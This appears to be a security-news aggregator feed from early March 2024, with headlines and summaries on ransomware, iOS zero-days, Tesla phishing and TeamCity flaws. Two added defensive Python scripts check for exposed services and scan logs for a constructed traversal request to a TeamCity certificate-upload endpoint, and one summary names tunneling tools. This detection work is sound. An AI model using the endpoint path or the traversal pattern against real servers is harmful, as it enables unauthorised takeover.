          The National Cyber Security Centre (NCSC) of Switzerland has released a report on its analysis of a data breach following a ransomware attack on Xplain, disclosing that the incident impacted thousands of sensitive Federal government files. [...]


          Flipper Zero WiFi phishing attack can unlock and steal Tesla cars

          financial
          2024-03-07 https://www.bleepingcomputer.com/news/security/flipper-zero-wifi-phishing-attack-can-unlock-and-steal-tesla-cars/
          An easy phishing attack using a Flipper Zero device can lead to compromising Tesla accounts, unlocking cars, and starting them. The attack works on the latest Tesla app, version 4.30.6, and Tesla software version 11.1 2024.2.7. [...]

          Autosummary: (Figure: Adding a new Phone Key, source: Mysk.) To make matters worse, once a new Phone Key is added, the Tesla owner does not receive a notification about the fact through the app, and no alert is shown on the car's touchscreen. (Figure: The phishing process, source: Mysk.) After entering the Tesla account credentials, the phishing page requests the one-time password for the account, to help the attacker bypass the two-factor authentication protection.


          MiTM phishing attack can let attackers unlock and steal a Tesla

          financial
          2024-03-07 https://www.bleepingcomputer.com/news/security/mitm-phishing-attack-can-let-attackers-unlock-and-steal-a-tesla/
          Researchers demonstrated how they could conduct a Man-in-the-Middle (MiTM) phishing attack to compromise Tesla accounts, unlocking cars, and starting them. The attack works on the latest Tesla app, version 4.30.6, and Tesla software version 11.1 2024.2.7. [...]

          Autosummary: (Figure: Adding a new Phone Key, source: Mysk.) To make matters worse, once a new Phone Key is added, the Tesla owner does not receive a notification about the fact through the app, and no alert is shown on the car's touchscreen. (Figure: The phishing process, source: Mysk.) After entering the Tesla account credentials, the phishing page requests the one-time password for the account, to help the attacker bypass the two-factor authentication protection.


          Emergency. Ransomware halts beer production at Belgium’s Duvel brewery

          exploits ransomware
          2024-03-07 https://grahamcluley.com/emergency-ransomware-halts-beer-production-at-belgiums-duvel-brewery/
          I'm afraid that the people of Belgium are dealing with a national emergency.


          Haiti PM in Puerto Rico as gang violence continues

          ransomware
          2024-03-06 https://www.bbc.co.uk/news/world-latin-america-68486536
          Ariel Henry lands in San Juan after armed gangs attacked Haiti's main airport to stop his re-entry.


          Can the Panama Canal save itself?

          latam
          2024-03-06 https://www.bbc.co.uk/news/business-68467529
          The authority that runs the canal is looking at ways to conserve the water it needs to stay open.


          Urgent: Apple Issues Critical Updates for Actively Exploited Zero-Day Flaws

          exploits
          2024-03-06 https://thehackernews.com/2024/03/urgent-apple-issues-critical-updates.html
          Apple has released security updates to address several security flaws, including two vulnerabilities that it said have been actively exploited in the wild. The shortcomings are listed below: CVE-2024-23225, a memory corruption issue in Kernel that an attacker with arbitrary kernel read and write capability can exploit to bypass kernel memory protections; CVE-2024-23296, a memory


          Peru PM resigns after recording with woman leaked

          latam
          2024-03-06 https://www.bbc.co.uk/news/world-latin-america-68486544
          Alberto Otárola denies allegations he helped a woman gain lucrative government contracts.


          Apple fixes two actively exploited iOS zero-days (CVE-2024-23225, CVE-2024-23296)

          exploits
          2024-03-06 https://www.helpnetsecurity.com/2024/03/06/cve-2024-23225-cve-2024-23296/

          Apple has fixed two iOS zero-day vulnerabilities (CVE-2024-23225, CVE-2024-23296) exploited by attackers in the wild. CVE-2024-23225 and CVE-2024-23296 On Tuesday, Apple released security updates for all three supported branches of iOS and iPadOS. iOS and iPadOS 17.4 carry fixes for four vulnerabilities: Two affecting the privacy of users (allowing an app to read sensitive location information and making users’ locked tabs visible) CVE-2024-23225, a memory corruption issue in the OSes’ kernel that could allow attackers … More

          The post Apple fixes two actively exploited iOS zero-days (CVE-2024-23225, CVE-2024-23296) appeared first on Help Net Security.


          Alert: GhostSec and Stormous Launch Joint Ransomware Attacks in Over 15 Countries

          exploits ransomware
          2024-03-06 https://thehackernews.com/2024/03/alert-ghostsec-and-stormous-launch.html
          The cybercrime group called GhostSec has been linked to a Golang variant of a ransomware family called GhostLocker. “The GhostSec and Stormous ransomware groups are jointly conducting double extortion ransomware attacks on various business verticals in multiple countries,” Cisco Talos researcher Chetan Raghuprasad said in a report shared with The Hacker News. “GhostLocker and

          Autosummary: Attacks mounted by the group have targeted victims in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand, and Indonesia.


          New APT Group "Lotus Bane" Behind Recent Attacks on Vietnam's Financial Entities

          financial
          2024-03-06 https://thehackernews.com/2024/03/new-apt-group-lotus-bane-behind-recent.html
          A financial entity in Vietnam was the target of a previously undocumented threat actor called Lotus Bane that was first detected in March 2023. Singapore-headquartered Group-IB described the hacking outfit as an advanced persistent threat group that's believed to have been active since at least 2022. The exact specifics of the infection chain remain unknown as yet, but it involves the

          Autosummary: "This similarity suggests possible connections with or inspirations from OceanLotus, however, the different target industries make it likely that they are different," Anastasia Tikhonova, head of Threat Intelligence for APAC at Group-IB, said.


          LockBit 3.0’s Bungled Comeback Highlights the Undying Risk of Torrent-Based (P2P) Data Leakage

          ransomware
          2024-03-06 https://securityaffairs.com/160054/cyber-crime/lockbit-3-0s-comeback-torrent-based-p2p-data-leakage.html
          The wide torrent-based accessibility of these leaked victim files ensures the longevity of LockBit 3.0’s harmful impact. While embattled ransomware gang LockBit 3.0 fights for its survival following Operation Cronos, a coordinated takedown of the syndicate’s web infrastructure by global authorities, the availability of victim data leaked by the gang persists via peer-to-peer (P2P) torrent […]

          Autosummary: The wide torrent-based accessibility of these leaked victim files ensures the longevity of LockBit 3.0’s harmful impact. While embattled ransomware gang LockBit 3.0 fights for its survival following Operation Cronos, a coordinated takedown of the syndicate’s web infrastructure by global authorities, the availability of victim data leaked by the gang persists via peer-to-peer (P2P) torrent networks. "


          Hackers target Docker, Hadoop, Redis, Confluence with new Golang malware

          exploits
          2024-03-06 https://www.bleepingcomputer.com/news/security/hackers-target-docker-hadoop-redis-confluence-with-new-golang-malware/
          Hackers are targeting misconfigured servers running Apache Hadoop YARN, Docker, Confluence, or Redis with new Golang-based malware that automates the discovery and compromise of the hosts. [...] "

          Autosummary: New Golang malware for target discovery According to the researchers, the hackers deploy a set of four novel Golang payloads that are responsible for identifying and exploiting hosts running services for Hadoop YARN (h.sh), Docker (d.sh), Confluence (w.sh), and Redis (c.sh). "


          Whoops! ACEMAGIC ships mini PCs with free bonus pre-installed malware

          exploits
          2024-03-06 https://grahamcluley.com/whoops-acemagic-ships-mini-pcs-with-free-bonus-pre-installed-malware/
          Chinese mini PC manufacturer ACEMAGIC has made life a bit more interesting for its customers, by admitting that it has also been throwing in free malware with its products. "

          Autosummary: Upon meticulous examination, it was revealed that our software developers, in an effort to enhance user experience by reducing initial boot time, made adjustments to the Microsoft source code, including network settings, without obtaining software digital signatures (A digital signature is an electronic, encrypted, stamp of authentication on digital information such as email messages, macros, or electronic documents. “Upon meticulous examination…” I’m not sure whether to laugh or cry… But in short what I think they are saying here is that in an attempt to “enhance user experience” (no-one, especially not Elon Musk, wants to be forced into creating a Microsoft account to install Windows 11), they shoved in some code they found lying around the internet that offered to help set up the PC more quickly. "


          Watch out, GhostSec and Stormous groups jointly conducting ransomware attacks

          exploits ransomware
          2024-03-06 https://securityaffairs.com/160066/cyber-crime/ghostsec-stourmous-ransomware.html
          Researchers warn that the cybercrime groups GhostSec and Stormous have joined forces in a new ransomware campaign. The GhostSec and Stormous ransomware gangs are jointly conducting a ransomware campaign targeting various organizations in multiple countries, Cisco Talos reported. GhostSec is a financially motivated threat actor that is also involved in hacktivism-related operations. The group is […] "

          Autosummary: The disclosures made by the groups in their Telegram channels revealed that the ransomware attacks hit organizations in Cuba, Argentina, Poland, China, Lebanon, Israel, Uzbekistan, India, South Africa, Brazil, Morocco, Qatar, Turkiye, Egypt, Vietnam, Thailand, and Indonesia. "


          Duvel says it has "more than enough" beer after ransomware attack

          exploits ransomware
          2024-03-06 https://www.bleepingcomputer.com/news/security/duvel-says-it-has-more-than-enough-beer-after-ransomware-attack/
          Duvel Moortgat Brewery was hit by a ransomware attack late last night, bringing to a halt the beer production in the company's bottling facilities [...] "

          Autosummary: "At 1:30 AM last night, alarms went off in Duvel's IT department because ransomware was detected," stated Ellen Aarts, communications manager at Duvel Moortgat. "


          Canada's anti-money laundering agency offline after cyberattack

          financial ciber
          2024-03-06 https://www.bleepingcomputer.com/news/security/canadas-anti-money-laundering-agency-offline-after-cyberattack/
          The Financial Transactions and Reports Analysis Centre of Canada (FINTRAC) has announced that a "cyber incident" forced it to take its corporate systems offline as a precaution. [...] "

          Autosummary: Finally, the Memorial University of Newfoundland (MUN), the largest public university in Atlantic Canada, also suffered a cyberattack in January that affected classes, payment capabilities, and student portal access. "


          ALPHV ransomware gang fakes own death, fools no one

          exploits ransomware
          2024-03-06 https://www.malwarebytes.com/blog/ransomware/2024/03/alphv-ransomware-gang-fakes-own-death-fools-no-one
          The ALPHV gang's attempt to cover up an exit scam isn't going well. "

          Autosummary: Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. VX Underground reported that a day later, other ALPHV affiliates were also locked out of their accounts, while ALPHV issued an “ambiguous” message seemingly pointing the finger at the FBI for…something, before putting the source code to its ransomware up for sale for $5 million. The giveaway, spotted by ransomware researcher Fabian Wosar, was the URL of the takedown image, which was being kept in a directory called THIS WEBSITE HAS BEEN SEIZED_files . "


          Ukraine claims it hacked Russian Ministry of Defence, stole secrets and encryption ciphers

          rusia-ucrania
          2024-03-06 https://www.bitdefender.com/blog/hotforsecurity/ukraine-claims-it-hacked-russian-ministry-of-defence-stole-secrets-and-encryption-ciphers/
          Ukraine claims its hackers have gained possession of "the information security and encryption software" used by Russia's Ministry of Defence, as well as secret documents, reports, and instructions exchanged between over 2,000 units of Russia's security services. Read more in my article on the Hot for Security blog. "

          Autosummary: According to an official statement from the Defence Intelligence of Ukraine, the hack has allowed Ukraine to gain possession of "the information security and encryption software" used by Russia's Ministry of Defence (Minoborony), as well as secret documents, reports, and instructions exchanged between over 2,000 units of Russia's security services. "


          IONIX Exposure Validation identifies and prioritizes exploitable vulnerabilities

          exploits
          2024-03-06 https://www.helpnetsecurity.com/2024/03/06/ionix-exposure-validation/

          IONIX announced a significant extension to its Attack Surface Management (ASM) platform, Automated Exposure Validation. Customers of IONIX can now benefit from Exposure Validation capabilities for continuous exploitability testing on production environments without risk of disruption. IONIX leverages a toolbox of attack simulation techniques to conduct non-intrusive testing of customer systems. This new approach identifies critical exposures, ensuring that resource-strapped security teams can focus on the most significant risks to their business and get buy-in … More

          The post IONIX Exposure Validation identifies and prioritizes exploitable vulnerabilities appeared first on Help Net Security.

          "

          Autosummary: "


          Hackers Exploit Misconfigured YARN, Docker, Confluence, Redis Servers for Crypto Mining

          exploits
          2024-03-06 https://thehackernews.com/2024/03/hackers-exploit-misconfigured-yarn.html
          Threat actors are targeting misconfigured and vulnerable servers running Apache Hadoop YARN, Docker, Atlassian Confluence, and Redis services as part of an emerging malware campaign designed to deliver a cryptocurrency miner and spawn a reverse shell for persistent remote access. “The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and "

          Autosummary: "The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an N-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts," Cado security researcher Matt Muir said in a report shared with The Hacker News. "
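          The campaign described here and in the BleepingComputer item above turns on one point: the Docker, YARN, Redis and Confluence instances were reachable because they were listening on every interface, and in the Docker and Redis cases without any authentication in front of them. The following is an added example, not code from either article or from Cado's report, of the check a host owner would run before the attackers do: it parses `ss -ltn` output and flags any of the four services bound to a wildcard address. The service default ports in the map are an assumption of this example (adjust them to the deployment), and the ss output is constructed sample input.

```python
"""Exposure check for the services targeted in the campaign described above.

Added example, not code from the article or from Cado's report. It parses the
output of `ss -ltn` and flags the four services when they listen on a wildcard
address, i.e. are reachable from any network the host sits on. The service
default ports are an assumption of this example; the ss output below is
constructed sample input."""
import re
import subprocess
from typing import Dict, List, Tuple

# Default ports for the four services (assumed; adjust to your deployment).
WATCHED_PORTS: Dict[int, str] = {
    2375: "Docker Engine API (plain TCP, no TLS client auth)",
    6379: "Redis",
    8088: "Hadoop YARN ResourceManager REST API",
    8090: "Atlassian Confluence",
}

# Local-address spellings ss uses for "every interface" (IPv4 and IPv6).
WILDCARD_ADDRS = {"0.0.0.0", "*", "::", "[::]"}

# Constructed sample: Docker, YARN and Confluence exposed; Redis loopback-only.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port
LISTEN  0       128            0.0.0.0:22           0.0.0.0:*
LISTEN  0       4096           0.0.0.0:2375         0.0.0.0:*
LISTEN  0       511          127.0.0.1:6379         0.0.0.0:*
LISTEN  0       128                  *:8088               *:*
LISTEN  0       50                [::]:8090            [::]:*
LISTEN  0       128              [::1]:5432            [::]:*
"""

# One LISTEN row: state, two queue counters, local addr:port, peer addr:port.
ROW_RE = re.compile(r"^LISTEN\s+\d+\s+\d+\s+(\S+)\s+\S+")


def split_local(local: str) -> Tuple[str, int]:
    """'[::]:8090' -> ('[::]', 8090); '*:8088' -> ('*', 8088)."""
    addr, _, port = local.rpartition(":")
    return addr, int(port)


def exposed_services(ss_output: str) -> List[dict]:
    """Return the watched services that are bound to a wildcard address."""
    findings = []
    for line in ss_output.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        addr, port = split_local(m.group(1))
        if port in WATCHED_PORTS and addr in WILDCARD_ADDRS:
            findings.append({"port": port, "bind": addr, "service": WATCHED_PORTS[port]})
    return findings


def audit_live_host() -> List[dict]:
    """Run the same check against the current host (Linux with iproute2)."""
    out = subprocess.run(["ss", "-ltn"], capture_output=True, text=True, check=True).stdout
    return exposed_services(out)


if __name__ == "__main__":
    for f in exposed_services(SAMPLE_SS_OUTPUT):
        print(f"port {f['port']:<5} bound to {f['bind']:<8} {f['service']}")
```

          On the sample input this reports the Docker API, YARN ResourceManager and Confluence listeners; Redis bound to 127.0.0.1 passes. A clean result is necessary but not sufficient: Confluence in this campaign was hit through an N-day vulnerability, so a loopback-only bind does not replace patching.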


          Exit Scam: BlackCat Ransomware Group Vanishes After $22 Million Payout

          financial exploits ransomware
          2024-03-06 https://thehackernews.com/2024/03/exit-scam-blackcat-ransomware-group.html
          The threat actors behind the BlackCat ransomware have shut down their darknet website and likely pulled an exit scam after uploading a bogus law enforcement seizure banner. "ALPHV/BlackCat did not get seized. They are exit scamming their affiliates," security researcher Fabian Wosar said. "It is blatantly obvious when you check the source code of the new takedown notice." "There "

          Autosummary: "Internally, BlackCat may be worried about moles within their group, and closing up shop preemptively could stop a takedown before it occurs," Malachi Walker, a security advisor with DomainTools, said. "


          CISA ADDS ANDROID PIXEL AND SUNHILLO SURELINE BUGS TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG

          exploits
          2024-03-06 https://securityaffairs.com/160081/security/cisa-android-pixel-sunhillo-sureline-bugs-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Android Pixel and Sunhillo SureLine vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: The Android Pixel vulnerability, tracked as CVE-2023-21237, resides in applyRemoteView of NotificationContentInflater.java. The exploitation of this vulnerability could lead […] "

          Autosummary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2023-21237 Android Pixel Information Disclosure Vulnerability; CVE-2021-36380 Sunhillo SureLine OS Command Injection Vulnerability. The Android Pixel vulnerability, tracked as CVE-2023-21237, resides in applyRemoteView of NotificationContentInflater.java. "


          Hackers impersonate U.S. government agencies in BEC attacks

          government
          2024-03-06 https://www.bleepingcomputer.com/news/security/hackers-impersonate-us-government-agencies-in-bec-attacks/
          A gang of hackers specialized in business email compromise (BEC) attacks and tracked as TA4903 has been impersonating various U.S. government entities to lure targets into opening malicious files carrying links to fake bidding processes. [...] "

          Autosummary: According to Proofpoint, whose analysts have been tracking the campaign, the threat actors impersonate the U.S. Department of Transportation, the U.S. Department of Agriculture (USDA), and the U.S. Small Business Administration (SBA). "


          Protesters crash truck into Mexico"s National Palace

          latam
          2024-03-06 https://www.bbc.co.uk/news/world-latin-america-68494147
          President Andres Manuel Lopez Obrador was inside the building giving a press conference at the time. "

          Autosummary: "


          Top 10 scams targeting seniors – and how to keep your money safe

          financial
          2024-03-06 https://www.welivesecurity.com/en/scams/top-10-scams-seniors-how-keep-money-safe/
          The internet can be a wonderful place. But it’s also awash with fraudsters targeting people who are susceptible to fraud. "

          Autosummary: Investment scams: the highest earner for cybercriminals in 2022, making over $3.3 billion, this category refers to get-rich-quick schemes that promise low risk and guaranteed returns, often through cryptocurrency investments. What to do if you’ve been scammed: if you think you might have been scammed, get in touch with local police, your local bank (if financial details were involved) or even (in the US) Adult Protective Services. Never send money via wire transfer, payment apps, gift cards or cryptocurrency, as there’s no way of requesting it back in the event of fraud. 10 scams to watch out for: the internet can, of course, be a wonderful place. Tech support: in one of the oldest phone-based scams, the fraudster impersonates a legitimate entity like a tech company or telco provider, telling you there’s something wrong with your PC. "


          Critical JetBrains TeamCity On-Premises Flaws Could Lead to Server Takeovers

          government
          2024-03-05 https://thehackernews.com/2024/03/critical-jetbrains-teamcity-on-premises.html
          A new pair of security vulnerabilities have been disclosed in JetBrains TeamCity On-Premises software that could be exploited by a threat actor to take control of affected systems. The flaws, tracked as CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score: 7.3), have been addressed in version 2023.11.4. They impact all TeamCity On-Premises versions through 2023.11.3. “The "

          Autosummary: CVE-2024-27199, also an authentication bypass flaw, stems from a path traversal issue that can permit an unauthenticated attacker to replace the HTTPS certificate in a vulnerable TeamCity server with a certificate of their choosing via the "/app/https/settings/uploadCertificate" endpoint and even alter the port number the HTTPS service listens on. "


          Experts disclosed two severe flaws in JetBrains TeamCity On-Premises software

          government
          2024-03-05 https://securityaffairs.com/159995/security/jetbrains-teamcity-flaws.html
          Two new security flaws in JetBrains TeamCity On-Premises software can allow attackers to take over affected systems. Rapid7 researchers disclosed two new critical security vulnerabilities, tracked as CVE-2024-27198 (CVSS score: 9.8) and CVE-2024-27199 (CVSS score: 7.3), in JetBrains TeamCity On-Premises. An attacker can exploit the vulnerabilities to take control of affected systems. Below are the descriptions for these vulnerabilities: […] "

          Autosummary: Below are the descriptions for these vulnerabilities: CVE-2024-27198 is an authentication bypass vulnerability in the web component of TeamCity that arises from an alternative path issue (CWE-288) and has a CVSS base score of 9.8 (Critical). "
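          Both TeamCity write-ups above leave a defender with two concrete facts: every On-Premises release through 2023.11.3 is affected and 2023.11.4 is the fixed build, and CVE-2024-27199 lets an unauthenticated client reach the "/app/https/settings/uploadCertificate" endpoint through a path traversal. The following is an added example, not code from JetBrains, Rapid7 or either article, that turns those two facts into checks: a version comparison for inventory data, and an access-log scan that collapses ".." segments before matching the endpoint so a traversal-shaped request is caught as well as a direct one. The version strings and log lines are constructed sample input; the combined log format is an assumption of the example, and the traversal sample is made up to exercise the normalisation, not a replay of the disclosed vector.

```python
"""Two checks derived from the TeamCity On-Premises advisories above.

Added example, not code from JetBrains, Rapid7 or either article. It (1) tells
whether a TeamCity version string falls in the affected range (every release
through 2023.11.3; 2023.11.4 is fixed) and (2) scans web-server access logs for
requests that reach the certificate-upload endpoint named in the CVE-2024-27199
write-up, collapsing '..' segments first so a traversal-shaped path is matched
too. The version strings and log lines are constructed sample input; the
combined log format is an assumption of the example, and the traversal sample
is made up to exercise the normalisation, not a replay of the disclosed vector.
"""
import posixpath
import re
from typing import List, Tuple

FIXED_VERSION: Tuple[int, int, int] = (2023, 11, 4)
CERT_UPLOAD_PATH = "/app/https/settings/uploadCertificate"


def parse_version(text: str) -> Tuple[int, ...]:
    """'2023.11.3' -> (2023, 11, 3); '2023.11 (build 147512)' -> (2023, 11, 0)."""
    m = re.match(r"\s*(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unrecognised TeamCity version: {text!r}")
    parts = tuple(int(p) for p in m.group(1).split("."))
    return parts + (0,) * (3 - len(parts))   # pad short versions for comparison


def is_affected(version: str) -> bool:
    """True for every version below the fixed build."""
    return parse_version(version) < FIXED_VERSION


# Constructed combined-format access log; addresses are documentation ranges.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [05/Mar/2024:10:14:02 +0000] "POST /app/https/settings/uploadCertificate HTTP/1.1" 200 51 "-" "python-requests/2.31"
203.0.113.7 - - [05/Mar/2024:10:14:05 +0000] "GET /app/rest/server HTTP/1.1" 200 804 "-" "python-requests/2.31"
198.51.100.4 - - [05/Mar/2024:10:15:33 +0000] "GET /login.html HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Mar/2024:10:16:40 +0000] "POST /static/../app/https/settings/uploadCertificate HTTP/1.1" 200 51 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise_path(raw: str) -> str:
    """Drop the query string and collapse '.' and '..' segments."""
    return posixpath.normpath(raw.split("?", 1)[0])


def cert_upload_requests(log_text: str) -> List[dict]:
    """Requests whose normalised path is the certificate-upload endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if normalise_path(m["path"]) == CERT_UPLOAD_PATH:
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                         "raw_path": m["path"], "status": int(m["status"])})
    return hits


if __name__ == "__main__":
    for v in ("2023.11.3", "2023.11.4", "2023.05.4"):
        print(f"{v:<10} affected={is_affected(v)}")
    for h in cert_upload_requests(SAMPLE_ACCESS_LOG):
        print(f"{h['ts']} {h['ip']} {h['method']} {h['raw_path']} -> {h['status']}")
```

          A 200 on a POST to that endpoint from an address that never authenticated is the event to chase; on an already patched server the same request should not succeed. The log scan only sees what the front-end logged, so run it against the reverse proxy's log as well as TeamCity's own.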


          Ukraine’s GUR hacked the Russian Ministry of Defense

          rusia-ucrania
          2024-03-05 https://securityaffairs.com/159981/cyber-warfare-2/ukraine-gur-hacked-russian-ministry-of-defense.html
          The Main Intelligence Directorate (GUR) of Ukraine’s Ministry of Defense claims that it hacked the Russian Ministry of Defense. The Main Intelligence Directorate (GUR) of Ukraine’s Ministry of Defense announced it had breached the Russian Ministry of Defense servers as part of a special operation, and exfiltrated confidential documents. The stolen documents […] "

          Autosummary: This encompasses deputies, assistants, and specialists, individuals who used the electronic document management systems known as ‘bureaucrat’.” “Cyber specialists of the Ministry of Defense of Ukraine implemented another successful special operation against the aggressor state of Russia – as a result of the attack, it was possible to gain access to the servers of the Ministry of Defense of the Russian Federation.” "


          American Express warns customers about third party data breach

          financial
          2024-03-05 https://www.malwarebytes.com/blog/news/2024/03/american-express-warns-customers-about-third-party-data-breach
          American Express has warned affected customers about a breach at a merchant processor that leaked account numbers, names, and card expiration dates. "

          Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. Data breach: there are some actions you can take if you are, or suspect you may have been, the victim of a data breach. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer. "


          No “Apple magic” as 11% of macOS detections last year came from malware

          exploits
          2024-03-05 https://www.malwarebytes.com/blog/apple/2024/03/no-apple-magic-as-11-of-macos-detections-last-year-came-from-malware
          Last year, 11% of all detections on Macs were caused by malware. The illuminating figure gives a view into the world of Mac cyberthreats. "

          Autosummary: For decades, every multinational corporation, every local travel agency, every dentist, every hospital, every school, government, and city hall practically ran on Windows. Used in at least 1,018 known attacks last year, LockBit ransomware, and the operators behind it, destroyed countless businesses, ruined many organizations, and, according to the US Department of Justice, brought in more than $120 million before being disrupted by a coordinated law enforcement effort in February of this year. "


          Cybercriminals Using Novel DNS Hijacking Technique for Investment Scams

          financial ciber
          2024-03-05 https://thehackernews.com/2024/03/cybercriminals-using-novel-dns.html
          A new DNS threat actor dubbed Savvy Seahorse is leveraging sophisticated techniques to entice targets into fake investment platforms and steal funds. “Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms, make deposits to a personal account, and then transfers those deposits to a bank in Russia,” Infoblox said in a report "

          Autosummary: "


          Hackers abuse QEMU to covertly tunnel network traffic in cyberattacks

          ciber
          2024-03-05 https://www.bleepingcomputer.com/news/security/hackers-abuse-qemu-to-covertly-tunnel-network-traffic-in-cyberattacks/
          Malicious actors were detected abusing the open-source hypervisor platform QEMU as a tunneling tool in a cyberattack against a large company. [...] "

          Autosummary: Other tunneling tools used in attacks include CloudFlare tunnels, Stowaway, ligolo, 3proxy, dog-tunnel, chisel, gs-netcat, plink, iox, and nps. "


          BlackCat ransomware shuts down in exit scam, blames the "feds"

          financial exploits ransomware
          2024-03-05 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-shuts-down-in-exit-scam-blames-the-feds/
          The BlackCat ransomware gang is pulling an exit scam, trying to shut down and run off with affiliates' money by pretending the FBI seized their site and infrastructure. [...] "

          Autosummary: With claims from affiliates not getting paid, a sudden shut down of the infrastructure, cutting ties with multiple affiliates, the "GG" message on Tox, announcing that they're selling the malware source code, and especially pretending that the FBI took control of their websites, all this is a clear indication that ALPHV/BlackCat ransomware administrators are exit scamming. "


          Passwords are Costing Your Organization Money - How to Minimize Those Costs

          financial
          2024-03-05 https://www.bleepingcomputer.com/news/security/passwords-are-costing-your-organization-money-how-to-minimize-those-costs/
          Getting rid of passwords completely isn't a realistic option for most orgs, but there are things you can do to make them more secure. Learn more from Specops Software on maximizing security while mitigating costs. [...] "

          Autosummary: Productivity losses: Password problems — including forgotten passwords, password expirations, and password resets — can dent productivity, costing organizations valuable time and money. Hidden costs of password management From the potential for lost productivity to the tangible costs associated with help desk staff, password management tasks often incur substantial costs. "


          Hackers Exploit ConnectWise ScreenConnect Flaws to Deploy TODDLERSHARK Malware

          exploits
          2024-03-05 https://thehackernews.com/2024/03/hackers-exploit-connectwise.html
          North Korean threat actors have exploited the recently disclosed security flaws in ConnectWise ScreenConnect to deploy a new malware called TODDLERSHARK. According to a report shared by Kroll with The Hacker News, TODDLERSHARK overlaps with known Kimsuky malware such as BabyShark and ReconShark. “The threat actor gained access to the victim workstation by exploiting the exposed setup wizard "

          Autosummary: Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), KTA082, Nickel Kimball, and Velvet Chollima, has steadily expanded its malware arsenal to include new tools, the most recent being GoBear and Troll Stealer. "


          CISA ADDS MICROSOFT WINDOWS KERNEL BUG USED BY LAZARUS APT TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG

          exploits Linux
          2024-03-05 https://securityaffairs.com/160009/hacking/cisa-adds-microsoft-windows-kernel-bug-used-by-lazarus-apt-to-its-known-exploited-vulnerabilities-catalog.html
          U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Microsoft Windows Kernel vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the CVE-2024-21338 (CVSS Score 7.8) Microsoft Windows Kernel Exposed IOCTL with Insufficient Access Control vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. An attacker can exploit this vulnerability to gain SYSTEM privileges. […] "

          Autosummary: At the end of February, Avast researchers observed the North Korea-linked Lazarus APT group using an admin-to-kernel exploit for a zero-day vulnerability in the appid.sys AppLocker driver. "


          Apple fixes two new iOS zero-days exploited in attacks on iPhones

          exploits
          2024-03-05 https://www.bleepingcomputer.com/news/apple/apple-fixes-two-new-ios-zero-days-exploited-in-attacks-on-iphones/
          Apple released emergency security updates to fix two iOS zero-day vulnerabilities that were exploited in attacks on iPhones. [...] "

          Autosummary: "


          New WogRAT malware abuses online notepad service to store malware

          exploits
          2024-03-05 https://www.bleepingcomputer.com/news/security/new-wograt-malware-abuses-online-notepad-service-to-store-malware/
          A new malware dubbed "WogRAT" targets both Windows and Linux in attacks abusing an online notepad platform named "aNotepad" as a covert channel for storing and retrieving malicious code. [...] "

          Autosummary: There are five supported functions: run a command; download a file from a specified URL; upload a specified file to the C2; wait for a specified time (in seconds); terminate. (Figure: FTP file upload, ASEC.) Linux version: the Linux version of WogRAT, which comes in ELF form, shares many similarities with the Windows variant. "


          VMware urgent updates addressed Critical ESXi Sandbox Escape bugs

          exploits
          2024-03-05 https://securityaffairs.com/160037/security/vmware-critical-sandbox-escape-flaws.html
          VMware released urgent patches to address critical ESXi sandbox escape vulnerabilities in the ESXi, Workstation, Fusion and Cloud Foundation products Virtualization giant VMware released urgent updates to fix critical ESXi sandbox escape vulnerabilities in the ESXi, Workstation, Fusion, and Cloud Foundation products. The most severe vulnerabilities can be exploited by an attacker with local admin […] "

          Autosummary: "


          Apple emergency security updates fix two new iOS zero-days

          exploits
          2024-03-05 https://securityaffairs.com/160048/hacking/apple-new-ios-zero-day-vulnerabilities.html
          Apple released emergency security updates to address two new iOS zero-day vulnerabilities actively exploited in the wild against iPhone users. Apple released emergency security updates to address two iOS zero-day vulnerabilities, respectively tracked as CVE-2024-23225 and CVE-2024-23296, that were exploited in attacks against iPhone devices. CVE-2024-23225 is a Kernel memory corruption flaw, the company addressed it […] "

          Autosummary: "


          95% believe LLMs making phishing detection more challenging

          financial
          2024-03-04 https://www.helpnetsecurity.com/2024/03/04/social-engineering-phishing-attacks/

          More than 95% of responding IT and security professionals believe social engineering attacks have become more sophisticated in the last year, according to LastPass. Recent AI advancements, particularly generative AI, have empowered cybercriminals to coordinate social engineering assaults with unprecedented precision and customization. Phishing and other social engineering attacks manipulate people into sharing information they shouldn’t or making other mistakes that compromise their personal or organizational security. Psychological manipulation through social engineering will continue to … More

